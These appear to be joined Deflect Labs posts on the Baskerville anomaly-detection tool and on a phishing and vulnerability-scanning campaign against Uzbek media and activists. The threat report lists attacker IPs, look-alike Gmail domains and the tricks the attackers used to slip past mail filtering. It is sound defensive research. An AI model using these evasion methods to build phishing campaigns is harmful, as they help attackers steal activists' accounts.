Baskerville is a machine operating on the Deflect network that protects sites from hounding, malicious bots. It’s also an open source project that, in time, will be able to reduce bad behaviour on your networks too. Baskerville responds to web traffic, analyzing requests in real-time, and challenging those acting suspiciously. A few months ago, Baskerville passed an important milestone – making its own decisions on traffic deemed anomalous. The quality of these decisions (recall) is high and Baskerville has already successfully mitigated many sophisticated real-life attacks.
We’ve trained Baskerville to recognize what legitimate traffic on our network looks like, and how to distinguish it from malicious requests attempting to disrupt our clients’ websites. Baskerville has turned out to be very handy for mitigating DDoS attacks, and for correctly classifying other types of malicious behaviour.
Baskerville is an important contribution to the world of online security – where solid web defences are usually the domain of proprietary software companies or complicated manual rule-sets. The ever-changing nature and patterns of attacks makes their mitigation a continuous process of adaptation. This is why we’ve trained a machine how to recognize and respond to anomalous traffic. Our plans for Baskerville’s future will enable plug-and-play installation in most web environments and privacy-respecting exchange of threat intelligence data between your server and the Baskerville clearinghouse.
Chapter 2 – Background
Web attacks are a threat to democratic voices on the Internet. Botnets deploy an arsenal of methods, including brute force password login, vulnerability scanning, and DDoS attacks, to overwhelm a platform’s hosting resources and defences, or to wreak financial damage on the website’s owners. Attacks become a form of punishment, intimidation, and most importantly, censorship, whether through direct denial of access to an Internet resource or by instilling fear among the publishers. Much of the development to-date in anomaly detection and mitigation of malicious network traffic has been closed source and proprietary. These silo-ed approaches are limiting when dealing with constantly changing variables. They are also quite expensive to set-up, with a company’s costs often offset by the sale or trade of threat intelligence gathered on the client’s network, something Deflect does not do or encourage.
Since 2010, the Deflect project has protected hundreds of civil society and independent media websites from web attacks, processing over a billion monthly website requests from humans and bots. We are now bringing internally developed mitigation tooling to a wider audience, improving network defences for freedom of expression and association on the internet.
Baskerville was developed over three years by eQualitie’s dedicated team of machine learning experts. Several challenges or ambitions were presented to the team. To make this an effective solution to the ever-growing need for humans to perform constant network monitoring, and the never-ending need to create rules to ban newly discovered malicious network behaviour, Baskerville had to:
Be fast enough to make it count
Be able to adapt to changing traffic patterns
Provide actionable intelligence (a prediction and a score for every IP)
Provide reliable predictions (probation period & feedback)
Baskerville works by analyzing HTTP traffic bound for your website, monitoring the proportion of legitimate vs anomalous traffic. On the Deflect network, it will trigger a Turing challenge to an IP address behaving suspiciously, thereafter confirming whether a real person or a bot is sending us requests.
Chapter 3 – Baskerville Learns
To detect new evolving threats, Baskerville uses the unsupervised anomaly detection algorithm Isolation Forest. The majority of anomaly detection algorithms construct a profile of normal instances, then classify instances that do not conform to the normal profile as anomalies. The main problem with this approach is that the model is optimized to detect normal instances, but not optimized to detect anomalies causing either too many false alarms or too few anomalies. In contrast, Isolation Forest explicitly isolates anomalies rather than profiling normal instances. This method is based on a simple assumption: ‘Anomalies are few, and they are different’. In addition, the Isolation Forest algorithm does not require a training set to contain normal instances only. Moreover, the algorithm performs even better if the training set contains some anomalies, or attack incidents in our case. This enables us to re-train the model regularly on all the recent traffic without any labeling procedure in order to adapt to the changing patterns.
Labelling
Despite the fact that we don’t need labels to train a model, we still need a labelled dataset of historical attacks for parameter tuning. Traditionally, labelling is a challenging procedure since it requires a lot of manual work. Every new attack must be reported and investigated, and every IP should be labelled either malicious or benign.
Our production environment reports several incidents a week, so we designed an automated procedure of labelling using a machine model trained on the same features we use for the Isolation Forest anomaly detection model.
We reasoned that if an attack incident has a clearly visible traffic spike, we can assume that the vast majority of the IPs during this period are malicious, and we can train a classifier like Random Forest particularly for this incident. The only user input would be the precise time period for that incident and for the time period for ordinal traffic for that host. Such a classifier would not be perfect, but it would be good enough to be able to separate some regular IPs from the majority of malicious IPs during the time of the incident. In addition, we assume that attacker IPs most likely are not active immediately before the attack, and we do not label an IP as malicious if it was seen in the regular traffic period.
This labelling procedure is not perfect, but it allows us to label new incidents with very little time or human interaction.
Performance Metrics
We use the Precision-Recall AUC metric for model performance evaluation. The main reason for using the Precision-Recall metric is that it is more sensitive to the improvements for the positive class than the ROC (receiver operating characteristic) curve. We are less concerned about the false positive rate since, in the event that we falsely predict that an IP is doing something malicious, we won’t ban it, but only notify the rule-based attack mitigation system to challenge that specific IP. The IP will only be banned if the challenge fails.
Categorical Features
After two months of validating our approach in the production environment, we started to realize that the model was not sophisticated enough to distinguish anomalies specific only to particular clients.
The main reason for this is that the originally published Isolation Forest algorithm supports only numerical features, and could not work with so-called categorical string values, such as hostname. First, we decided to train a separate model per target host and create an assembly of models for the final prediction. This approach over complicated the whole process and did not scale well. Additionally, we had to take care of adjusting the weights in the model assembly. In fact, we jeopardized the original idea of knowledge sharing by having a single model for all the clients. Then we tried to use the classical way of dealing with this problem: one-hot encoding. However, the deployed solution did not work well since the model became too overfit to the new hostname feature, and the performance decreased.
In the next iteration, we found another way of encoding categorical features based on a peer-review paper recently published in 2018. The main idea was not to use one-hot encoding, but rather to modify the tree-building algorithm itself. We could not find the implementation of the idea, and had to modify the source code of IForest library in Scala. We introduced a new string feature ‘hostname,’ and this time the model showed notable performance improvement in production. Moreover, our final implementation was generic and allowed us to experiment with other categorical features like country, user agent, operating system, etc.
Stratified Sampling
Baskerville uses a single machine learning model trained on the data received from hundreds of clients.This allows us to share the knowledge and benefit from a model trained on a global dataset of recorded incidents. However, when we first deployed Baskerville, we realized that the model is biased towards high traffic clients.
We had to find a balance in the amount of data we feed to the training pipeline from each client. On the one hand, we wanted to equalize the number of records from each client, but on the other hand, high traffic clients provided much more valuable incident information. We decided to use stratified sampling of training datasets with a single parameter: the maximum number of samples per host.
Storage
Baskerville uses Postgres to store the processed results. The request-sets table holds the results of the real-time weblogs pre-processed by our analytics engine which has an estimated input of ~30GB per week. So, within a year, we’d have a ~1.5 TB table. Even though this is within Postgres limits, running queries on this would not be very efficient. That’s where the data partitioning feature of Postgres came in. We used that feature to split the request sets table into smaller tables, each holding one week’s data. . This allowed for better data management and faster query execution.
However, even with the use of data partitioning, we needed to be able to scale the database out. Since we already had the Timescale extension for the Prometheus database, we decided to use it for Baskerville too. We followed Timescale’s tutorial for data migration in the same database, which means we created a temp table, moved the data from each and every partition into the temp table, ran the command to create a hypertable on the temp table, deleted the initial request sets table and its partitions, and, finally, renamed the temp table as ‘request sets.’ The process was not very straightforward, unfortunately, and we did run into some problems. But in the end, we were able to scale the database, and we are currently operating using Timescale in production.
We also explored other options, like TileDb, Apache Hive, and Apache HBase, but for the time being, Timescale is enough for our needs. We will surely revisit this in the future, though.
Architecture
The initial design of Baskerville was created with the assumption that Baskerville will be running under Deflect as an analytics engine, to aid the already in place rule-based attack detection and mitigation mechanism. However, the needs changed as it became necessary to open up Baskerville’s prediction to other users and make our insights available to them.
In order to allow other users to take advantage of our model, we had to redesign the pipelines to be more modular. We also needed to take into account the kind of data to be exchanged, more specifically, we wanted to avoid any exchange that would involve sensitive data, like IPs for example. The idea was that the preprocessing would happen on the client’s end, and only the resulting feature vectors would be sent, via Kafka, to the Prediction centre. The Prediction centre continuously listens for incoming feature vectors, and once a request arrives, it uses the pre-trained model to predict and send the results back to the user. This whole process happens without the exchange of any kind of sensitive information, as only the feature vectors go back and forth.
On the client side, we had to implement a caching mechanism with TTL, so that the request sets wait for their matching predictions. If the prediction center takes more than 10 minutes, the request sets expire. 10 minutes, of course, is not an acceptable amount of time, just a safeguard so that we do not keep request sets forever which can result in OOM. The ttl is configurable. We used Redis for this mechanism, as it has the ttl feature embedded, and there is a spark-redis connector we could easily use, but we’re still tuning the performance and thinking about alternatives. We also needed a separate spark application to handle the prediction to request set matching once the response from the Prediction center is received.. This application listens to the client specific Kafka topic, and once a prediction arrives, it looks into redis, fetches the matched request set, and saves everything into the database.
To sum up, in the new architecture, the preprocessing happens on the client’s side, the feature vectors are sent via Kafka to the Prediction centre (no sensitive data exchange), a prediction and a score for each request set is sent as a reply to each feature vector (via Kafka), and on the client side, another Spark job is waiting to consume the prediction message, match it with the respective request set, and save it to the database.
Read more about the project and download the source to try for yourself. Contact us for more information or to get help setting up Baskerville in your web environment.
The attacks leading to the publication of this report quickly stood out from the daily onslaught of malicious traffic on Deflect, at first because they were using professional vulnerability scanning tools like Acunetix. The moment we discovered that the origin server of these scans was also hosting fake gmail domains, it became evident that something bigger was going on here. In this report, we describe all the pieces put together about this campaign, with the hope to contribute to public knowledge about the methods and impact of such attacks against civil society.
Context : Human Rights and Surveillance in Uzbekistan
Uzbekistan is defined by many human-rights organizations as an authoritarian state, that has known strong repression of civil society. Since the collapse of the Soviet Union, two presidents have presided over a system that institutionalized torture and repressed freedom of expression, as documented over the years by Human Rights Watch, Amnesty International and Front Line Defenders, among many others. Repression extended to media and human rights activists in particular, many of whom had to leave the country and continue their work in diaspora.
Uzbekistan was one of the first to establish a pervasive Internet censorship infrastructure, blocking access to media and human rights websites. Hacking Team servers in Uzbekistan were identified as early as 2014 by the Citizen Lab. It was later confirmed that Uzbek National Security Service (SNB) were among the customers of Hacking Team solutions from leaked Hacking Team emails. A Privacy International report from 2015 describes the installation in Uzbekistan of several monitoring centers with mass surveillance capabilities provided by the Israeli branch of the US-based company Verint Systems and by the Israel-based company NICE Systems. A 2007 Amnesty International report entitled ‘We will find you anywhere’ gives more context on the utilisation of these capabilities, describing digital surveillance and targeted attacks against Uzbek journalists and human-right activists. Among other cases, it describes the unfortunate events behind the closure of uznews.net – an independent media website established by Galima Bukharbaeva in 2005 following the Andijan massacre. In 2014, she discovered that her email account had been hacked and information about the organization, including names and personal details journalists in Uzbekistan was published online. Galima is now the editor of Centre1, a Deflect client and one of the targets of this investigation.
A New Phishing and Web Attack Campaign
On the 16th of November 2018, we identified a large attack against several websites protected by Deflect. This attack used several professional security audit tools like NetSparker and WPScan to scan the websites eltuz.com and centre1.com.
Peak of traffic during the attack (16th of November 2018)
This attack was coming from the IP address 51.15.94.245 (AS12876 – Online AS but an IP range dedicated to Scaleway servers). By looking at older traffic from this same IP address, we found several cases of attacks on other Deflect protected websites, but we also found domains mimicking google and gmail domains hosted on this IP address, like auth.login.google.email-service[.]host or auth.login.googlemail.com.mail-auth[.]top. We looked into passive DNS databases (using the PassiveTotal Community Edition and other tools like RobTex) and crossed that information with attacks seen on Deflect protected websites with logging enabled. We uncovered a large campaign combining web and phishing attacks against media and activists. We found the first evidence of activity from this group in February 2016, and the first evidence of attacks in December 2017.
The list of Deflect protected websites chosen by this campaign, may give some context to the motivation behind them. Four websites were targeted:
Fergana News is a leading independent Russian & Uzbek language news website covering Central Asian countries
Centre1 is an independent media organization covering news in Central Asia
Palestine Chronicle is a non-profit organization working on human-rights issues in Palestine
Three of these targets are prominent media focusing on Uzbekistan. We have been in contact with their editors and several other Uzbek activists to see if they had received phishing emails as part of this campaign. Some of them were able to confirm receiving such messages and forwarded them to us. Reaching out further afield we were able to get confirmations of phishing attacks from other prominent Uzbek activists who were not linked websites protected by Deflect.
Palestine Chronicle seems to be an outlier in this group of media websites focusing on Uzbekistan. We don’t have a clear hypothesis about why this website was targeted.
A year of web attacks against civil society
Through passive DNS, we identified three IPs used by the attackers in this operation :
46.45.137.74 was used in 2016 and 2017 (timeline is not clear, Istanbul DC, AS197328)
139.60.163.29 was used between October 2017 and August 2018 (HostKey, AS395839)
51.15.94.245 was used between September 2018 and February 2019 (Scaleway, AS12876)
We have identified 15 attacks from the IPs 139.60.163.29 and 51.15.94.245 since December 2017 on Deflect protected websites:
Date
IP
Target
Tools used
2017/12/17
139.60.163.29
eltuz.com
WPScan
2018/04/12
139.60.163.29
eltuz.com
Acunetix
2018/09/15
51.15.94.245
www.palestinechronicle.com eltuz.com www.fergana.info and uzbek.fergananews.com
Acunetix and WebCruiser
2018/09/16
51.15.94.245
www.fergana.info
Acunetix
2018/09/17
51.15.94.245
www.fergana.info
Acunetix
2018/09/18
51.15.94.245
www.fergana.info
NetSparker and Acunetix
2018/09/19
51.15.94.245
eltuz.com
NetSparker
2018/09/20
51.15.94.245
www.fergana.info
Acunetix
2018/09/21
51.15.94.245
www.fergana.info
Acunetix
2018/10/08
51.15.94.245
eltuz.com, www.fergananews.com and news.fergananews.com
Unknown
2018/11/16
51.15.94.245
eltuz.com, centre1.com and en.eltuz.com
NetSparker and WPScan
2019/01/18
51.15.94.245
eltuz.com
WPScan
2019/01/19
51.15.94.245
fergana.info www.fergana.info and fergana.agency
Unknown
2019/01/30
51.15.94.245
eltuz.com and en.eltuz.com
Unknown
2019/02/05
51.15.94.245
fergana.info
Acunetix
Besides classic open-source tools like WPScan, these attacks show the utilization of a wide range of commercial security audit tools, like NetSparker or Acunetix. Acunetix offers a trial version that may have been used here, NetSparker does not, showing that the operators may have a consistent budget (standard offer is $4995 / year, a cracked version may have been used).
It is also surprising to see so many different tools coming from a single server, as many of them require a Graphical User Interface. When we scanned the IP 51.15.94.245, we discovered that it hosted a Squid proxy on port 3128, we think that this proxy was used to relay traffic from the origin operator computer.
Extract of nmap scan of 51.15.94.245 in December 2018 :
3128/tcp open http-proxy Squid http proxy 3.5.23
|_http-server-header: squid/3.5.23
|_http-title: ERROR: The requested URL could not be retrieved
A large phishing campaign
After discovering a long list of domains made to resemble popular email providers, we suspected that the operators were also involved in a phishing campaign. We contacted owners of targeted websites, along with several Uzbek human right activists and gathered 14 different phishing emails targeting two activists between March 2018 and February 2019 :
Date
Sender
Subject
Link
12th of March 2018
g.corp.sender[@]gmail.com
У Вас 2 недоставленное сообщение (You have 2 undelivered message)
http://mail.gmal.con.my-id[.]top/
13th of June 2018
service.deamon2018[@]gmail.com
Прекращение предоставления доступа к сервису (Termination of access to the service)
http://e.mail.gmall.con.my-id[.]top/
18th of June 2018
id.warning.users[@]gmail.com
Ваш новый адрес в Gmail: alexis.usa@gmail.com (Your new email address in Gmail: alexis.usa@gmail.com)
http://e.mail.users.emall.com[.]my-id.top/
10th of July 2018
id.warning.daemons[@]gmail.com
Прекращение предоставления доступа к сервису (Termination of access to the service)
hxxp://gmallls.con-537d7.my-id[.]top/
10th of July 2018
id.warning.daemons[@]gmail.com
Прекращение предоставления доступа к сервису (Termination of access to the service)
Almost all these emails were mimicking Gmail alerts to entice the user to click on the link. For instance this email received on the 23rd of October 2018 pretends that the account will be closed soon, using images of the text hosted on imgur to bypass Gmail detection :
The only exception was an email received on the 16th of October 2018 pretending to give confidential information on the former Hokim (governor) of Tashkent :
Emails were using simple tricks to bypass detection, at times drw.sh url shortener (this tool belongs to a Russian security company Doctor Web) or by using open re-directions offered in several Google tools.
Every email we have seen used a different sub-domain, including emails from the same Gmail account and with the same subject line. For instance, two different emails entitled “Прекращение предоставления доступа к сервису” and sent from the same address used hxxp://gmallls.con-537d7.my-id[.]top/ and http://gmallls.con-4f137.my-id[.]top/ as phishing domains. We think that the operators used a different sub-domain for every email sent in order to bypass Gmail list of known malicious domains. This would explain the large number of sub-domains identified through passive DNS. We have identified 74 sub-domains for 26 second-level domains used in this campaign (see the appendix below for full list of discovered domains).
We think that the phishing page stayed online only for a short time after having sent the email in order to avoid detection. We got access to the phishing page of a few emails. We could confirm that the phishing toolkit checked if the password is correct or not (against the actual gmail account) and suspect that they implemented 2 Factor authentication for text messages and 2FA applications, but could not confirm this.
Timeline for the campaign
We found the first evidence of activity in this operation with the registration of domain auth-login[.]com on the 21st of February 2016. Because we discovered the campaign recently, we have little information on attacks during 2016 and 2017, but the domain registration date shows some activity in July and December 2016, and then again in August and October 2017. It is very likely that the campaign started in 2016 and continued in 2017 without any public reporting about it.
Here is a first timeline we obtained based on domain registration dates and dates of web attacks and phishing emails :
To confirm that this group had some activity during 2016 and 2017, we gathered encryption (TLS) certificates for these domains and sub-domains from the crt.sh Certificate Transparency Database. We identified 230 certificates generated for these domains, most of them created by Cloudfare. Here is a new timeline integrating the creation of TLS certificates :
We see here many certificates created since December 2016 and continuing over 2017, which shows that this group had some activity during that time. The large number of certificates over 2017 and 2018 comes from campaign operators using Cloudflare for several domains. Cloudflare creates several short-lived certificates at the same time when protecting a website.
It is also interesting to note that the campaign started in February 2016, with some activity in the summer of 2016, which happens to when the former Uzbek president Islam Karimov died, news first reported by Fergana News, one of the targets of this attack campaign.
Infrastructure Analysis
We identified domains and subdomains of this campaign through analysis of passive DNS information, using mostly the Community access of PassiveTotal. Many domains in 2016/2017 reused the same registrant email address, b.adan1@walla.co.il, which helped us identify other domains related to this campaign :
Based on this list, we identified subdomains and IP addresses associated with them, and discovered three IP addresses used in the operation. We used Shodan historical data and dates of passive DNS data to estimate the timeline of the utilisation of the different servers :
46.45.137.74 was used in 2016 and 2017
139.60.163.29 was used between October 2017 and August 2018
51.15.94.245 was used between September and February 2019
We have identified 74 sub-domains for 26 second-level domains used in this campaign (see the appendix for a full list of IOCs). Most of these domains are mimicking Gmail, but there are also domains mimicking Yandex (auth.yandex.ru.my-id[.]top), mail.ru (mail.ru.my-id[.]top) qip.ru (account.qip.ru.mail-help-support[.]info), yahoo (auth.yahoo.com.mail-help-support[.]info), Live (login.live.com.mail-help-support[.]info) or rambler.ru (mail.rambler.ru.mail-help-support[.]info). Most of these domains are sub-domains of a few generic second-level domains (like auth-mail.com), but there are a few specific second-level domains that are interesting :
We have not found any information on vzlom[.]top and fixerman[.]top. Vzlom means “break into” in Russian, so it could have hosted or mimicked a security website
A weird Cyber-criminality Nexus
It is quite unusual to see connections between targeted attacks and cyber-criminal enterprises, however during this investigation we encountered two such links.
The first one is with the domain msoffice365[.]win which was registered by b.adan1@walla.co.il (as well as many other domains from this campaign) on the 7th of December 2016. This domain was identified as a C2 server for a cryptocurrency theft tool called Quant, as described in this Forcepoint report released in December 2017. Virus Total confirms that this domain hosted several samples of this malware in November 2017 (it was registered for a year). We have not seen any malicious activity from this domain related to our campaign, but as explained earlier, we have marginal access to the group’s activity in 2017.
The second link we have found is between the domain auth-login[.]com and the groups behind the Bedep trojan and the Angler exploit kit. auth-login[.]com was linked to this operation through the subdomain login.yandex.ru.auth-login[.]com that fit the pattern of long subdomains mimicking Yandex from this campaign and it was hosted on the same IP address 46.45.137.74 in March and April 2016 according to RiskIQ. This domain was registered in February 2016 by yingw90@yahoo.com (David Bowers from Grovetown, GA in the US according to whois information). This email address was also used to register hundreds of domains used in a Bedep campaign as described by Talos in February 2016 (and confirmed by severalother reports). Angler exploit kit is one of the most notorious exploit kit, that was commonly used by cyber-criminals between 2013 and 2016. Bedep is a generic backdoor that was identified in 2015, and used almost exclusively with the Angler exploit kit. It should be noted that Trustwave documented the utilization of Bedep in 2015 to increase the number of views of pro-Russian propaganda videos.
Even if we have not seen any utilisation of these two domains in this campaign, these two links seem too strong to be considered cirmcumstantial. These links could show a collaboration between cyber-criminal groups and state-sponsored groups or services. It is interesting to remember the potential involvement of Russian hacking groups in attacks on Uznews.net editor in 2014, as described by Amnesty international.
Taking Down Servers is Hard
When the attack was discovered, we decided to investigate without sending any abuse requests, until a clearer picture of the campaign emerged. In January, we decided that we had enough knowledge of the campaign and started to send abuse requests – for fake Gmail addresses to Google and for the URL shorteners to Doctor Web. We did not receive any answer but noticed that the Doctor Web URLs were taken down a few days after.
Regarding the Scaleway server, we entered into an unexpected loop with their abuse process. Scaleway operates by sending the abuse request directly to the customer and then asks them for confirmation that the issue has been resolved. This process works fine in the case of a compromised server, but does not work when the server was rented intentionally for malicious activities. We did not want to send an abuse request because it would have involved giving away information to the operators. We contacted Scaleway directly and it took some time to find the right person on the security team. They acknowledged the difficulty of having an efficient Abuse Process, and after we sent them an anonymized version of this report along with proof that phishing websites were hosted on the server, they took down the server around the 25th of January 2019.
Being an infrastructure provider, we understand the difficulty of dealing with abuse requests. For a lot of hosting providers, the number of requests is what makes a case urgent or not. We encourage hosting providers to better engage with organisations working to protect Civil Society and establish trust relationships that help quickly mitigate the effects of malicious campaigns.
Conclusion
In this report, we have documented a prolonged phishing and web attack campaign focusing on media covering Uzbekistan and Uzbek human right activists. It shows that once again, digital attacks are a threat for human-right activists and independent media. There are several threat actors known to use both phishing and web attacks combined (like the Vietnam-related group OceanLotus), but this campaign shows a dual strategy targeting civil society websites and their editors at the same time.
We have no evidence of government involvement in this operation, but these attacks are clearly targeted on prominent voices of Uzbek civil society. They also share strong similarities with the hack of Uznews.net in 2014, where the editor’s mailbox was compromised through a phishing email that appeared as a notice from Google warning her that the account had been involved in distributing illegal pornography.
Over the past 10 years, several organisations like the Citizen Lab or Amnesty International have dedicated lots of time and effort to document digital surveillance and targeted attacks against Civil Society. We hope that this report will contribute to these efforts, and show that today, more than ever, we need to continue supporting civil society against digital surveillance and intrusion.
Counter-Measures Against such Attacks
If you think you are targeted by similar campaigns, here is a list of recommendations to protect yourself.
Against phishing attacks, it is important to learn to recognize classic phishing emails. We give some examples in this report, but you can read othersimilar reports by the Citizen Lab. You can also read this nice explanation by NetAlert and practice with this Google Jigsaw quizz. The second important point is to make sure that you have configured 2-Factor Authentication on your email and social media accounts. Two-Factor Authentication means using a second way to authenticate when you log-in besides your password. Common second factors include text messages, temporary password apps or hardware tokens. We recommend using either temporary password apps (like Google Authenticator; FreeOTP) or Hardware Keys (like YubiKeys). Hardware keys are known to be more secure and strongly recommended if you are an at-risk activist or journalist.
Against web attacks, if you are using a CMS like WordPress or Drupal, it is very important to update both the CMS and its plugins very regularly, and avoid using un-maintained plugins (it is very common to have websites compromised because of outdated plugins). Civil society websites are welcome to apply to Deflect for free website protection.
Appendix
Acknowledgement
We would like to thank Front Line Defenders and Scaleway for their help. We would also like to thank ipinfo.io and RiskIQ for their tools that helped us in the investigation.
The Deflect platform is a free website security service defending civil society and human rights groups from digital attack. Currently, malicious traffic is identified on the Deflect network by Banjax, a system that uses handwritten rules to flag IPs that are behaving like attacking bots, so that they can be challenged or banned. While Banjax is successful at identifying the most common bruteforce cyber attacks, the approach of using a static set of rules to protect against the constantly evolving tools available to attackers is fundamentally limited. Over the past year, the Deflect Labs team has been working to develop a machine learning module to automatically identify malicious traffic on the Deflect platform, so that our mitigation efforts can keep pace with the methods of attack as these grow in complexity and sophistication.
In this report, we look at the performance of the Deflect Labs’ new anomaly detection tool, Baskerville, in identifying a selection of the attacks seen on the Deflect platform during the last year. Baskerville is designed to consume incoming batches of web logs (either live from a Kafka stream, or from Elasticsearch storage), group them into request sets by host website and IP, extract the browsing features of each request set, and make a prediction about whether the behaviour is normal or not. At its core, Baskerville currently uses the Scikit-Learn implementation of the Isolation Forest anomaly detection algorithm to conduct this classification, though the engine is agnostic to the choice of algorithm and any trained Scikit-Learn classifier can be used in its place. This model is trained on normal web traffic data from the Deflect platform, and evaluated using a suite of offline tools incorporated in the Baskerville module. Baskerville has been designed in such a way that once the performance of the model is sufficiently strong, it can be used for real-time attack alerting and mitigation on the Deflect platform.
To showcase the current capabilities of the Baskerville module, we have replayed the attacks covered in the 2018 Deflect Labs report: Attacks Against Vietnamese Civil Society, passing the web logs from these incidents through the processing and prediction engine. This report was chosen for replay because of the variety of attacks seen across its constituent incidents. There were eight attacks in total considered in this report, detailed in the table below.
Date
Start (approx.)
Stop (approx.)
Target
2018/04/17
08:00
10:00
viettan.org
2018/04/17
08:00
10:00
baotiengdan.com
2018/05/04
00:00
23:59
viettan.org
2018/05/09
10:00
12:30
viettan.org
2018/05/09
08:00
12:00
baotiengdan.com
2018/06/07
01:00
05:00
baotiengdan.com
2018/06/13
03:00
08:00
baotiengdan.com
2018/06/15
13:00
23:30
baotiengdan.com
Table 1: Attack time periods covered in this report. The time period of each attack was determined by referencing the number of Deflect and Banjax logs recorded for each site, relative to the normal traffic volume.
How does it work?
Given one request from one IP, not much can be said about whether or not that user is acting suspiciously, and thus how likely it is that they are a malicious bot, as opposed to a genuine user. If we instead group together all the requests to a website made by one IP over time, we can begin to build up a more complete picture of the user’s browsing behaviour. We can then train an anomaly detection algorithm to identify any IPs that are behaving outside the scope of normal traffic.
The boxplots below illustrate how the behaviour during the Vietnamese attack time periods differs from that seen during an average fortnight of requests to the same sites. To describe the browsing behaviour, 17 features (detailed in the Baskerville documentation) have been extracted based on the request sets (note that the feature values are scaled relative to average distributions, and do not have a physical interpretation). In particular, it can be seen that these attack time periods stand out by having far fewer unique paths requested (unique_path_to_request_ratio), a shorter average path depth (path_depth_average), a smaller variance in the depth of paths requested (path_depth_variance), and a lower payload size (payload_size_log_average). By the ‘path depth’, we mean the number of slashes in the requested URL (so ‘website.com’ has a path depth of zero, and ‘website.com/page1/page2’ has a path depth of two), and by ‘payload size’ we mean the size of the request response in bytes.
Figure 1:The distributions of the 17 scaled feature values during attack time periods (red) and non-attack time periods (blue). It can be seen that the feature distributions are notably different during the attack and non-attack periods.
The separation between the attack and non-attack request sets can be nicely visualised by projecting along the feature dimensions identified above. In the three-dimensional space defined by the average path depth, the average log of the payload size, and the unique path to request ratio, the request sets identified as malicious by Banjax (red) are clearly separated from those not identified as malicious (blue).
Figure 2:The distribution of request sets along three of the 17 feature dimensions for IPs identified as malicious (red) or benign (blue) by the existing banning module, Banjax. The features shown are the average path depth, the average log of the request payload size, and the ratio of unique paths to total requests, during each request set. The separation between the malicious (red) and benign (blue) IPs is evident along these dimensions.
Training a Model
A machine learning classifier enables us to more precisely define the differences between normal and abnormal behaviour, and predict the probability that a new request set comes from a genuine user. For this report, we chose to train an Isolation Forest; an algorithm that performs well on novelty detection problems, and scales for large datasets.
As an anomaly detection algorithm, the Isolation Forest took as training data all the traffic to the Vietnamese websites over a normal two-week period. To evaluate its performance, we created a testing dataset by partitioning out a selection of this data (assumed to represent benign traffic), and combining this with the set of all requests coming from IPs flagged by the Deflect platform’s current banning tool, Banjax (assumed to represent malicious traffic). There are a number of tunable parameters in the Isolation Forest algorithm, such as the number of trees in the forest, and the assumed contamination with anomalies of the training data. Using the testing data, we performed a gridsearch over these parameters to optimize the model’s accuracy.
Replaying the Attacks
The model chosen for use in this report has a precision of 0.90, a recall of 0.86, and a resultant f1 score of 0.88, when evaluated on the testing dataset formulated from the Vietnamese website traffic, described above. If we take the Banjax bans as absolute truth (which is almost certainly not the case), this means that 90% of the IPs predicted as anomalous by Baskerville were also flagged by Banjax as malicious, and that 88% of all the IPs flagged by Banjax as malicious were also identified as anomalous by Baskerville, across the attacks considered in the Vietnamese report. This is demonstrated visually in the graph below, which shows the overlap between the Banjax flag and the Baskerville prediction (-1 indicates malicious, and +1 indicates benign). It can be seen that Baskerville identifies almost all of the IPs picked up by Banjax, and additionally flags a fraction of the IPs not banned by Banjax.
Figure 3:The overlap between the Banjax results (x-axis) and the Baskerville prediction results (colouring). Where the Banjax flag is -1 and the prediction colour is red, both Banjax and Baskerville agree that the request set is malicious. Where the Banjax flag is +1 and the prediction colour is blue, both modules agree that the request set is benign. The small slice of blue where the Banjax flag is -1, and the larger red slice where the Banjax flag is +1, indicate request sets about which the modules do not agree.
The performance of the model can be broken down across the different attack time periods. The grouped bar chart below compares the number of Banjax bans (red) to the number of Baskerville anomalies (green). In general, Baskerville identifies a much greater number of request sets as being malicious than Banjax does, with the exception of the 17th April attack, for which Banjax picked up slightly more IPs than Baskerville. The difference between the two mitigation systems is particularly pronounced on the 13th and 15th June attacks, for which Banjax scarcely identified any malicious IPs at all, but Baskerville identified a high proportion of malicious IPs.
Figure 4:The verdicts of Banjax (left columns) and Baskerville (right columns) across the 6 attack periods. The red/green components show the number of request sets that Banjax/Baskerville labelled as malicious, while the blue/purple components show the number that they labelled as benign. The fact that the green bars are almost everywhere higher than the red bars indicates that Baskerville picks up more traffic as malicious than does Banjax.
This analysis highlights the issue of model validation. It can be seen that Baskerville is picking up more request sets as being malicious than Banjax, but does this indicate that Baskerville is too sensitive to anomalous behaviour, or that Baskerville is outperforming Banjax? In order to say for sure, and properly evaluate Baskerville’s performance, a large testing set of labelled data is needed.
If we look at the mean feature values across the different attacks, it can be seen that the 13th and 15th June attacks (the red and blue dots, respectively, in the figure below) stand out from the normal traffic in that they have a much lower than normal average path depth (path_depth_average), and a much higher than normal 400-code response rate (response4xx_to_request_ratio), which may have contributed to Baskerville identifying a large proportion of their constituent request sets as malicious. Since a low average path depth (e.g. lots of requests made to ‘/’) and a high 400 response code rate (e.g. lots of requests to non-existent pages) are indicative of an IP behaving maliciously, this may suggest that Baskerville’s predictions were valid in these cases. But more labelled data is required for us to be certain about this evaluation.
Figure 5:Breakdown of the mean feature values during the two attack periods (red, blue) for which Baskerville identified a high proportion of malicious IPs, but Banjax did not. These are compared to the mean feature values during a normal two-week period (green).
Putting Baskerville into Action
Replaying the Vietnamese attacks demonstrates that it is possible for the Baskerville engine to identify cyber attacks on the Deflect platform in real time. While Banjax mitigates attacks using a set of static human-written rules describing what abnormal traffic looks like, by comprehensively describing how normal traffic behaves, the Baskerville classifier is able to identify new types of malicious behaviour that have never been seen before.
Although the performance of the Isolation Forest in identifying the Vietnamese attacks is promising, we would require a higher level of accuracy before the Baskerville engine is used to automatically ban IPs from accessing Deflect websites. The model’s accuracy can be improved by increasing the amount of data it is trained on, and by performing additional feature engineering and parameter tuning. However, to accurately assess its skill, we require a large set of labelled testing data, more complete than what is offered by Banjax logs. To this end, we propose to first deploy Baskerville in a developmental stage, during which IPs that are suspected to be malicious will be served a Captcha challenge rather than being absolutely banned. The results of these challenges can be added to the corpus of labelled data, providing feedback on Baskerville’s performance.
In addition to the applications of Baskerville for attack mitigation on the Deflect platform, by grouping incoming logs by host and IP into request sets, and extracting features from these request sets, we have created a new way to visualise and analyse attacks after they occur. We can compare attacks not just by the IPs involved, but also by the type of behaviour displayed. This opens up new possibilities for connecting disparate attacks, and investigating the agents behind them.
Where Next?
